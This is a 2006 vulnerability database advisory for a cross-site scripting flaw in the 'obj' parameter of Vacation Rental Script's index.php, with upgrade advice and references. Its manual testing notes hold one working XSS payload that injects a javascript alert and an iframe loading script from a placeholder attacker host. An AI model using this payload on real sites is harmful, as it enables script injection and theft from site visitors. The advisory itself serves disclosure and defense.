Vacation Rental Script index.php obj Variable XSS

2006-05-25T09:34:37
ID OSVDB:25789
Type osvdb
Reporter OSVDB
Modified 2006-05-25T09:34:37

Description

Solution Description

Upgrade to version 1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/index.php?obj=<INPUT%20TYPE="IMAGE"%20SRC=javascript:alert('XSS');><iframe%20src=http://[attacker]/code.js>

References:

Vendor URL: http://www.vacationrentalscript.com/ Secunia Advisory ID:20324 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0439.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0589.html FrSIRT Advisory: ADV-2006-2015 CVE-2006-2651 Bugtraq ID: 18134